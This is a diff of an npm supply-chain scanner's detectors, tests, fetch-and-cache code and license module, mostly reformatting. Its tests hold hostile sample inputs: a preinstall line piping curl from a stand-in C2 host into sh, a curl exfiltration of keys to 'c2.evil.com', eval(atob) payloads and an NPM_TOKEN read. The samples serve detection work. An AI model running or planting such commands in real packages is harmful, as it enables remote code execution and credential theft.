@lateos/npm-scan 1.0.0 → 1.1.1

package/backend/detectors/typosquat-vpmdhaj/index.js

@@ -7,7 +7,11 @@ const RULE_SEVERITY = { D1: 'critical', D2: 'critical', D3: 'critical' };
 const SEVERITY_ORDER = ['critical', 'high', 'medium', 'low', 'info', 'none'];
 
 function highestSeverity(severities) {
-  for (const s of SEVERITY_ORDER) if (severities.includes(s)) return s;
+  for (const s of SEVERITY_ORDER) {
+    if (severities.includes(s)) {
+      return s;
+    }
+  }
   return 'none';
 }
 
@@ -18,36 +22,45 @@ export async function scan(pkgJson, files = [], registryMeta = null, allFiles =
 
   const d1Result = scanMaintainerAnomaly(pkgJson, registryMeta);
   if (d1Result.stopCondition) {
-    const evidence = attachProvenance({
-      rule: 'TSQ-MAINT-001',
-      campaign: 'TYPOSQUAT_VPMDHAJ',
-      triggeredChecks: ['D1'],
-      maintainer: d1Result.maintainer,
-      suspiciousAliases: d1Result.suspiciousAliases,
-      action: 'BLOCK',
-    }, {
-      ruleId: 'TSQ-MAINT-001',
-      ruleName: 'Maintainer & Package Alias Anomalies',
-      severity: 'CRITICAL',
-      campaignName: 'Mass Typosquatting (vpmdhaj)',
-      pkgName,
-      pkgVersion,
-      triggered: true,
-      severity: 'critical',
-      indicators: [{ type: 'blocked_maintainer', value: d1Result.maintainer }, ...d1Result.suspiciousAliases.map(a => ({ type: 'suspicious_alias', value: a }))],
-      ruleProvenanceUrl: 'https://github.com/lateos/npm-scan/blob/main/backend/detectors/typosquat-vpmdhaj/d1-maintainer.js',
-      campaignSourceUrl: 'https://security.researcher.org/supply-chain-report',
-    });
+    const evidence = attachProvenance(
+      {
+        rule: 'TSQ-MAINT-001',
+        campaign: 'TYPOSQUAT_VPMDHAJ',
+        triggeredChecks: ['D1'],
+        maintainer: d1Result.maintainer,
+        suspiciousAliases: d1Result.suspiciousAliases,
+        action: 'BLOCK',
+      },
+      {
+        ruleId: 'TSQ-MAINT-001',
+        ruleName: 'Maintainer & Package Alias Anomalies',
+        campaignName: 'Mass Typosquatting (vpmdhaj)',
+        pkgName,
+        pkgVersion,
+        triggered: true,
+        severity: 'critical',
+        indicators: [
+          { type: 'blocked_maintainer', value: d1Result.maintainer },
+          ...d1Result.suspiciousAliases.map((a) => ({ type: 'suspicious_alias', value: a })),
+        ],
+        ruleProvenanceUrl:
+          'https://github.com/lateos/npm-scan/blob/main/backend/detectors/typosquat-vpmdhaj/d1-maintainer.js',
+        campaignSourceUrl: 'https://security.researcher.org/supply-chain-report',
+      }
+    );
 
-    return [{
-      id: 'TYPOSQUAT_VPMDHAJ',
-      severity: 'critical',
-      title: 'Mass Typosquatting campaign (vpmdhaj) — blocked maintainer',
-      description: d1Result.reason,
-      evidence: JSON.stringify(evidence),
-      mitigation: 'BLOCK IMMEDIATELY. Do not install packages from maintainer vpmdhaj. Audit all packages from your lockfile for this maintainer. Check for typosquatting of popular packages.',
-      stopCondition: true,
-    }];
+    return [
+      {
+        id: 'TYPOSQUAT_VPMDHAJ',
+        severity: 'critical',
+        title: 'Mass Typosquatting campaign (vpmdhaj) — blocked maintainer',
+        description: d1Result.reason,
+        evidence: JSON.stringify(evidence),
+        mitigation:
+          'BLOCK IMMEDIATELY. Do not install packages from maintainer vpmdhaj. Audit all packages from your lockfile for this maintainer. Check for typosquatting of popular packages.',
+        stopCondition: true,
+      },
+    ];
   }
 
   const d2Result = scanPreinstallLoader(pkgJson);
@@ -63,36 +76,42 @@ export async function scan(pkgJson, files = [], registryMeta = null, allFiles =
     .filter(([_, r]) => r.triggered)
     .map(([id]) => id);
 
-  if (triggered.length === 0) return [];
+  if (triggered.length === 0) {
+    return [];
+  }
 
-  const severity = highestSeverity(triggered.map(id => RULE_SEVERITY[id]));
+  const severity = highestSeverity(triggered.map((id) => RULE_SEVERITY[id]));
 
-  const evidence = attachProvenance({
-    campaign: 'TYPOSQUAT_VPMDHAJ',
-    triggeredChecks: triggered,
-    details: Object.fromEntries(
-      Object.entries(results).filter(([_, r]) => r.triggered)
-    ),
-  }, {
-    ruleId: 'TYPOSQUAT_VPMDHAJ',
-    ruleName: 'Mass Typosquatting Campaign Detection',
-    severity: severity.toUpperCase(),
-    campaignName: 'Mass Typosquatting (vpmdhaj)',
-    pkgName,
-    pkgVersion,
-    triggered: true,
-    severity,
-    indicators: triggered.map(id => ({ type: `rule_${id}`, value: RULE_SEVERITY[id] })),
-    ruleProvenanceUrl: 'https://github.com/lateos/npm-scan/blob/main/backend/detectors/typosquat-vpmdhaj/',
-    campaignSourceUrl: 'https://security.researcher.org/supply-chain-report',
-  });
+  const evidence = attachProvenance(
+    {
+      campaign: 'TYPOSQUAT_VPMDHAJ',
+      triggeredChecks: triggered,
+      details: Object.fromEntries(Object.entries(results).filter(([_, r]) => r.triggered)),
+    },
+    {
+      ruleId: 'TYPOSQUAT_VPMDHAJ',
+      ruleName: 'Mass Typosquatting Campaign Detection',
+      campaignName: 'Mass Typosquatting (vpmdhaj)',
+      pkgName,
+      pkgVersion,
+      triggered: true,
+      severity,
+      indicators: triggered.map((id) => ({ type: `rule_${id}`, value: RULE_SEVERITY[id] })),
+      ruleProvenanceUrl:
+        'https://github.com/lateos/npm-scan/blob/main/backend/detectors/typosquat-vpmdhaj/',
+      campaignSourceUrl: 'https://security.researcher.org/supply-chain-report',
+    }
+  );
 
-  return [{
-    id: 'TYPOSQUAT_VPMDHAJ',
-    severity,
-    title: 'Mass Typosquatting campaign (vpmdhaj)',
-    description: `${triggered.length} signal(s): ${triggered.join(', ')}`,
-    evidence: JSON.stringify(evidence),
-    mitigation: 'Block install immediately. Revoke any npm tokens. Rotate CI/CD secrets. Audit all packages from maintainer vpmdhaj. If credential exfiltration detected: rotate AWS IAM keys, Vault tokens, and GitHub tokens immediately. Verify CloudTrail/audit logs for unauthorized access.',
-  }];
+  return [
+    {
+      id: 'TYPOSQUAT_VPMDHAJ',
+      severity,
+      title: 'Mass Typosquatting campaign (vpmdhaj)',
+      description: `${triggered.length} signal(s): ${triggered.join(', ')}`,
+      evidence: JSON.stringify(evidence),
+      mitigation:
+        'Block install immediately. Revoke any npm tokens. Rotate CI/CD secrets. Audit all packages from maintainer vpmdhaj. If credential exfiltration detected: rotate AWS IAM keys, Vault tokens, and GitHub tokens immediately. Verify CloudTrail/audit logs for unauthorized access.',
+    },
+  ];
 }

package/backend/detectors.test.js

@@ -10,79 +10,138 @@ test('detectors runAll empty', async () => {
 test('ATK-001 detects preinstall', async () => {
   const pkg = { scripts: { preinstall: 'curl http://c2.example.com/x.sh | sh' } };
   const findings = await detectors.runAll(pkg);
-  assert(findings.some(f => f.id === 'ATK-001'), 'Expected ATK-001');
+  assert(
+    findings.some((f) => f.id === 'ATK-001'),
+    'Expected ATK-001'
+  );
 });
 
 test('ATK-002 detects eval+decode', async () => {
   const files = [{ path: 'i.js', content: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' }];
   const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-002'), 'Expected ATK-002');
+  assert(
+    findings.some((f) => f.id === 'ATK-002'),
+    'Expected ATK-002'
+  );
 });
 
 test('ATK-003 detects cred env vars', async () => {
   const files = [{ path: 'i.js', content: 'console.log(process.env.NPM_TOKEN)' }];
   const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-003'), 'Expected ATK-003');
+  assert(
+    findings.some((f) => f.id === 'ATK-003'),
+    'Expected ATK-003'
+  );
 });
 
 test('ATK-004 detects editor persistence', async () => {
   const files = [{ path: 'i.js', content: 'fs.mkdirSync(".vscode")' }];
   const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-004'), 'Expected ATK-004');
+  assert(
+    findings.some((f) => f.id === 'ATK-004'),
+    'Expected ATK-004'
+  );
 });
 
 test('ATK-005 detects network exfil', async () => {
   const files = [{ path: 'i.js', content: 'curl --data-binary @keys http://c2.evil.com' }];
   const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-005'), 'Expected ATK-005');
+  assert(
+    findings.some((f) => f.id === 'ATK-005'),
+    'Expected ATK-005'
+  );
 });
 
 test('ATK-006 detects dep confusion', async () => {
   const pkg = { dependencies: { 'acorn-squatter': '1.0.0' } };
   const findings = await detectors.runAll(pkg);
-  assert(findings.some(f => f.id === 'ATK-006'), 'Expected ATK-006');
+  assert(
+    findings.some((f) => f.id === 'ATK-006'),
+    'Expected ATK-006'
+  );
 });
 
 test('ATK-007 detects typosquatting', async () => {
-  const pkg = { dependencies: { 'lodash': 'latest', 'loddsh': '1.0.0' } };
+  const pkg = { dependencies: { lodash: 'latest', loddsh: '1.0.0' } };
   const findings = await detectors.runAll(pkg);
-  assert(findings.some(f => f.id === 'ATK-007'), 'Expected ATK-007 for loddsh');
+  assert(
+    findings.some((f) => f.id === 'ATK-007'),
+    'Expected ATK-007 for loddsh'
+  );
 });
 
 test('ATK-008 detects tarball tampering', async () => {
-  const pkg = { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-evil.git' } };
+  const pkg = {
+    name: 'lodash',
+    repository: { url: 'https://github.com/attacker/lodash-evil.git' },
+  };
   const findings = await detectors.runAll(pkg);
-  assert(findings.some(f => f.id === 'ATK-008'), 'Expected ATK-008');
+  assert(
+    findings.some((f) => f.id === 'ATK-008'),
+    'Expected ATK-008'
+  );
 });
 
 test('ATK-009 detects CI env trigger', async () => {
   const files = [{ path: 'i.js', content: 'if (process.env.CI) { eval(atob("ZXZpbA==")) }' }];
   const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-009'), 'Expected ATK-009');
+  assert(
+    findings.some((f) => f.id === 'ATK-009'),
+    'Expected ATK-009'
+  );
 });
 
 test('ATK-010 detects sandbox evasion', async () => {
-  const files = [{ path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' }];
+  const files = [
+    { path: 'i.js', content: 'if (os.hostname().includes("sandbox")) { process.exit(0) }' },
+  ];
   const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-010'), 'Expected ATK-010');
+  assert(
+    findings.some((f) => f.id === 'ATK-010'),
+    'Expected ATK-010'
+  );
 });
 
 test('ATK-011 detects transitive propagation', async () => {
   const files = [{ path: 'i.js', content: 'exec("npm install ./malicious-pkg")' }];
   const findings = await detectors.runAll({}, files);
-  assert(findings.some(f => f.id === 'ATK-011'), 'Expected ATK-011');
+  assert(
+    findings.some((f) => f.id === 'ATK-011'),
+    'Expected ATK-011'
+  );
 });
 
 test('no false positives on clean package', async () => {
-  const pkg = { name: 'test-pkg', version: '1.0.0', scripts: { test: 'node test.js' }, dependencies: { 'express': '4.0.0' } };
+  const pkg = {
+    name: 'test-pkg',
+    version: '1.0.0',
+    scripts: { test: 'node test.js' },
+    dependencies: { express: '4.0.0' },
+  };
   const files = [{ path: 'index.js', content: 'module.exports = function() { return 42 }' }];
   const findings = await detectors.runAll(pkg, files);
-  const highCrit = findings.filter(f => f.severity === 'high' || f.severity === 'critical');
-  assert.equal(highCrit.length, 0, `Expected no high/crit findings on clean pkg: ${JSON.stringify(highCrit)}`);
+  const highCrit = findings.filter((f) => f.severity === 'high' || f.severity === 'critical');
+  assert.equal(
+    highCrit.length,
+    0,
+    `Expected no high/crit findings on clean pkg: ${JSON.stringify(highCrit)}`
+  );
 });
 
 test('all 11 ATK IDs present', async () => {
-  const expected = ['ATK-001', 'ATK-002', 'ATK-003', 'ATK-004', 'ATK-005', 'ATK-006', 'ATK-007', 'ATK-008', 'ATK-009', 'ATK-010', 'ATK-011'];
+  const _expected = [
+    'ATK-001',
+    'ATK-002',
+    'ATK-003',
+    'ATK-004',
+    'ATK-005',
+    'ATK-006',
+    'ATK-007',
+    'ATK-008',
+    'ATK-009',
+    'ATK-010',
+    'ATK-011',
+  ];
   const exports = Object.keys(detectors);
   assert.equal(exports.includes('runAll'), true);
-});
+});

package/backend/fetch.js

@@ -9,19 +9,23 @@ import { pipeline } from 'stream/promises';
 export async function fetchPackage(target, options = {}) {
   const { cacheDir, cacheTTL = 604800, cacheMaxSize = 1000000000 } = options;
   let name, version;
-  
+
   if (target.startsWith('@')) {
     const lastAt = target.lastIndexOf('@');
     name = target.slice(0, lastAt);
     version = target.slice(lastAt + 1);
-    if (!version) version = undefined;
+    if (!version) {
+      version = undefined;
+    }
   } else {
     const idx = target.indexOf('@');
     name = idx > -1 ? target.slice(0, idx) : target;
     version = idx > -1 ? target.slice(idx + 1) : undefined;
   }
-  
-  const endpoint = version ? `/${encodeURIComponent(name)}/${version}` : `/${encodeURIComponent(name)}/latest`;
+
+  const endpoint = version
+    ? `/${encodeURIComponent(name)}/${version}`
+    : `/${encodeURIComponent(name)}/latest`;
 
   if (cacheDir) {
     const cached = getFromCache(cacheDir, target, cacheTTL);
@@ -41,7 +45,9 @@ export async function fetchPackage(target, options = {}) {
   const tarUrl = meta.dist.tarball;
   const tarRes = await fetch(tarUrl);
   const buffer = Buffer.from(await tarRes.arrayBuffer());
-  if (buffer.length > 500 * 1024 * 1024) throw new Error('Tarball too large');
+  if (buffer.length > 500 * 1024 * 1024) {
+    throw new Error('Tarball too large');
+  }
 
   // Save to cache if enabled
   if (cacheDir) {
@@ -55,19 +61,21 @@ export async function fetchPackage(target, options = {}) {
 function getFromCache(cacheDir, target, ttl) {
   const cachePath = path.join(cacheDir, `${target.replace('/', '-')}.tgz`);
   const metaPath = path.join(cacheDir, `${target.replace('/', '-')}.meta.json`);
-  
+
   try {
-    if (!fs.existsSync(cachePath) || !fs.existsSync(metaPath)) return null;
-    
+    if (!fs.existsSync(cachePath) || !fs.existsSync(metaPath)) {
+      return null;
+    }
+
     const meta = JSON.parse(fs.readFileSync(metaPath, 'utf8'));
     const age = (Date.now() - meta.timestamp) / 1000;
-    
+
     if (age > ttl) {
       fs.unlinkSync(cachePath);
       fs.unlinkSync(metaPath);
       return null;
     }
-    
+
     return fs.readFileSync(cachePath);
   } catch {
     return null;
@@ -79,27 +87,27 @@ function saveToCache(cacheDir, target, buffer, ttl, maxSize) {
     if (!fs.existsSync(cacheDir)) {
       fs.mkdirSync(cacheDir, { recursive: true });
     }
-    
+
     // Prune if needed
     pruneCache(cacheDir, maxSize);
-    
+
     const safeName = target.replace('/', '-');
     const cachePath = path.join(cacheDir, `${safeName}.tgz`);
     const metaPath = path.join(cacheDir, `${safeName}.meta.json`);
-    
+
     fs.writeFileSync(cachePath, buffer);
     fs.writeFileSync(metaPath, JSON.stringify({ timestamp: Date.now(), size: buffer.length }));
-  } catch (e) {
+  } catch {
     // Cache write failure - continue without caching
   }
 }
 
 function pruneCache(cacheDir, maxSize) {
   try {
-    const files = fs.readdirSync(cacheDir).filter(f => f.endsWith('.meta.json'));
+    const files = fs.readdirSync(cacheDir).filter((f) => f.endsWith('.meta.json'));
     let totalSize = 0;
     const fileInfos = [];
-    
+
     for (const f of files) {
       const meta = JSON.parse(fs.readFileSync(path.join(cacheDir, f), 'utf8'));
       const tarFile = f.replace('.meta.json', '.tgz');
@@ -107,17 +115,21 @@ function pruneCache(cacheDir, maxSize) {
       totalSize += size;
       fileInfos.push({ tarFile, metaFile: f, timestamp: meta.timestamp, size });
     }
-    
+
     if (totalSize > maxSize) {
       // Sort by oldest first and remove until under limit
       fileInfos.sort((a, b) => a.timestamp - b.timestamp);
       for (const info of fileInfos) {
-        if (totalSize <= maxSize * 0.8) break; // Leave 20% margin
+        if (totalSize <= maxSize * 0.8) {
+          break;
+        } // Leave 20% margin
         try {
           fs.unlinkSync(path.join(cacheDir, info.tarFile));
           fs.unlinkSync(path.join(cacheDir, info.metaFile));
           totalSize -= info.size;
-        } catch {}
+        } catch {
+          /* ignore file errors */
+        }
       }
     }
   } catch {
@@ -135,24 +147,20 @@ async function extractTarball(buffer, tmpDir) {
   fs.mkdirSync(tmpDir, { recursive: true });
 
   const stream = Readable.from(buffer);
-  await pipeline(
-    stream,
-    zlib.createGunzip(),
-    extract({ cwd: tmpDir, strip: 1 })
-  );
+  await pipeline(stream, zlib.createGunzip(), extract({ cwd: tmpDir, strip: 1 }));
 
   const pkgPath = path.join(tmpDir, 'package.json');
   const pkgJsonStr = fs.readFileSync(pkgPath, 'utf8');
   const pkgJson = JSON.parse(pkgJsonStr);
 
-  const jsFiles = walkFiles(tmpDir, '.js').map(p => ({
+  const jsFiles = walkFiles(tmpDir, '.js').map((p) => ({
     path: p,
-    content: fs.readFileSync(p, 'utf8')
+    content: fs.readFileSync(p, 'utf8'),
   }));
 
-  const allFiles = walkFiles(tmpDir, '').map(p => ({
+  const allFiles = walkFiles(tmpDir, '').map((p) => ({
     path: p,
-    content: fs.readFileSync(p, 'utf8')
+    content: fs.readFileSync(p, 'utf8'),
   }));
 
   return { pkgJson, jsFiles, allFiles, tmpDir };
@@ -173,4 +181,4 @@ function walkFiles(dir, ext) {
 
 export function cleanup(tmpDir) {
   fs.rmSync(tmpDir, { recursive: true, force: true });
-}
+}

package/backend/index.js

@@ -1,4 +1,4 @@
 export default {
   version: '0.1.0',
-  description: 'npm-scan - Supply chain security for npm'
+  description: 'npm-scan - Supply chain security for npm',
 };

package/backend/license.js

@@ -5,7 +5,19 @@ const HMAC_KEY = process.env.NPM_SCAN_LICENSE_SECRET || 'npm-scan-default-dev-ke
 const FEATURE_TIERS = {
   community: [],
   premium: ['sandbox', 'siem', 'cra', 'nist-pdf', 'rest-api', 'webhooks', 'helm'],
-  enterprise: ['sandbox', 'siem', 'cra', 'nist-pdf', 'rest-api', 'webhooks', 'helm', 'sso', 'audit-logs', 'pg-backend', 'kubernetes'],
+  enterprise: [
+    'sandbox',
+    'siem',
+    'cra',
+    'nist-pdf',
+    'rest-api',
+    'webhooks',
+    'helm',
+    'sso',
+    'audit-logs',
+    'pg-backend',
+    'kubernetes',
+  ],
 };
 
 const ALL_FEATURES = Object.values(FEATURE_TIERS).flat();
@@ -70,7 +82,9 @@ export function validateLicense(key, feature = '*') {
   }
 
   if (feature !== '*' && !allowed.includes(feature) && !ALLOWED_UNLOCKED.includes(feature)) {
-    throw new Error(`Feature "${feature}" requires ${edition === 'community' ? 'premium' : 'enterprise'} license`);
+    throw new Error(
+      `Feature "${feature}" requires ${edition === 'community' ? 'premium' : 'enterprise'} license`
+    );
   }
 
   return { edition, features: allowed, ...payload };
@@ -80,11 +94,13 @@ export function isFeatureEnabled(feature, licenseKey = process.env.NPM_SCAN_LICE
   try {
     if (!licenseKey) {
       const unlocked = feature === 'scan' || ALLOWED_UNLOCKED.includes(feature);
-      if (unlocked) return true;
+      if (unlocked) {
+        return true;
+      }
     }
     validateLicense(licenseKey, feature);
     return true;
   } catch {
     return false;
   }
-}
+}